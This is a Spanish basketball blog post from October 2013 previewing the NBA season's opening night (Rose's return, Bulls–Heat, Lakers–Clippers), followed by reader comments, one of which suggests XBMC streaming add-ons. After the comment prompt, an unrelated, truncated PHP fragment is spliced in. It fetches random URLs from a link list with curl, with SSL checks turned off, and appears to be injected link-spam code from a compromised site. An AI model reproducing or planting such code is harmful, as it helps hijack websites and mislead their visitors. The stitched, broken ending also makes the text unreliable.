Se abre el telón

29 de October de 2013 por MagicJohnson32

Se abre el telón, y no es un chiste, excepto por la plantilla de los Sixers. Esta noche, cuando suenen las doce campanadas, la Cenicienta perderá un zapato mientras huye del baile, Pacers y Magic iniciarán su partido en el Bankers Life Fieldhouse de Indiana y nosotros nos dispondremos a disfrutar de la opening night de la temporada regular 2013-2014 de la NBA. Lo lamento, Anthony Randolph, pero se acabaron las pachangas, summer leagues y partidos de exhibición: a partir de esta noche, los resultados cuentan.

preview

Se alza el telón de la NBA, y no es un chiste, excepto por la millonada que ganará Gilbert Arenas sin derramar una gota de sudor. De la corta pero jugosa jornada inaugural destaca, por supuesto, el segundo advenimiento de Derrick Rose, sobre cuyos ligamentos recaerán todo el peso de nuestras miradas, los ríos de tinta que la prensa especializada le viene dedicando y la presión de una ciudad que lleva año y medio esperándolo. Rose, único MVP no llamado LeBron que la NBA ha conocido en los últimos cinco años, se enfrentará precisamente a James esta noche a partir de la 1h00. Los campeones, con el three-peat como principal reto que los consagre definitivamente entre los grandes equipos de la historia, se enfrentarán este año a la Conferencia Este más dura que se recuerda en décadas. Al retorno de Rose a unos Bulls hipercompetitivos incluso sin su estrella, a la consolidación de los Pacers entre los candidatos a todo, a la progresión de equipos como Cavs, Pistons, Raptors y sobre todo Wizards para formar una clase media-alta en la que ya no figuren únicamente Knicks y Hawks… a todo ello se suma la aparición, cual champiñón, del súper equipo de los Nets, con muchas cosas por demostrar todavía pero con mimbres de sobra para liderar el pelotón del Este.

Se levanta el telón de la NBA, y no es un chiste, salvo por aquello de que Kobe es el 25º jugador en el ranking de ESPN. Bryant no se vestirá de corto para esta noche de estrenos, en la que el Staples Center acogerá a partir de las 3h30 el primer asalto de las Hallway Series angelinas con los Clippers más favoritos que nunca. Los Lakers, en un año de transición que ha de servir para dejar atrás la hecatombe de la pasada campaña, serán poco más que testigos de la batalla por el cetro de una Conferencia Oeste que, esta vez sí, se presenta inferior al Este. Durant y Duncan, Thunder y Spurs, serán de nuevo los referentes y equipos a batir, mientras que Clippers, Rockets, Warriors y Grizzlies completan el grupo de equipos con plaza teóricamente fija en Playoffs. Eso dejaría dos plazas para Wolves, Lakers, Mavs, Blazers, Wolves, Pelicans… Es decir, más o menos lo mismo que vivimos en la 12-13. La certidumbre general que impera en el Oeste contrasta con los interrogantes en torno a Kobe Bryant y su maltrecho tendón de Aquiles, sobre su capacidad para recuperar el extraordinario nivel que mostró antes de lesionarse y sobre la necesidad de que fuerce lo más mínimo en su 18ª temporada como profesional. Parece incluso lógico plantearse que a la Mamba y a los Lakers les convenga unirse al contingente de tankers comandado por Suns y Sixers.

Se abre el telón, y estamos preparados. Hemos analizado a todas y cada una de las 30 plantillas de la NBA, hemos hecho nuestros equipos fantasy, nos hemos suscrito al League Pass (recordad: gratis la primera semana), hemos completado la porra TJ y hemos acumulado energías y recuperado horas de sueño para afrontar una nueva, fantástica temporada NBA durante la que os volveremos a ofrecer las ya tradicionales crónicas diarias.

Arriba, pues, el telón.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    bulls- heat

    que partidazo, si los bulls tuvieran al menos un tirador decente a la distancia en su quinteto inciail, los veria como candidato firme al titulo

      Citar

  2. rumbero dice:
    #2

    Que ganas de quitarse el mono.
    Para empezar, se abre el telón…y Oladipo es suplente ¿¿¿Pero que pasa aquí Denise???

      Citar

  3. Denise dice:
    #3

    rumbero:
    Que ganas de quitarse el mono.
    Para empezar, se abre el telón…y Oladipo es suplente ¿¿¿Pero que pasa aquí Denise???

    Supongo que Vaughn querrá meterle en la NBA poco a poco y lo utilizará como 6º hombre al principio. Pero dentro de 10-15 partidos imagino que será el 1 ó el 2 titular y se jugará mas de media hora por partido.

      Citar

  4. franitis dice:
    #4

    Por cierto, aparte del “League Pass”, XBMC con los add-ons “Sportsdevil” y “Livestream” no son malas opciones… Ahí lo dejo y disculpas si no se puede postear esa info…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>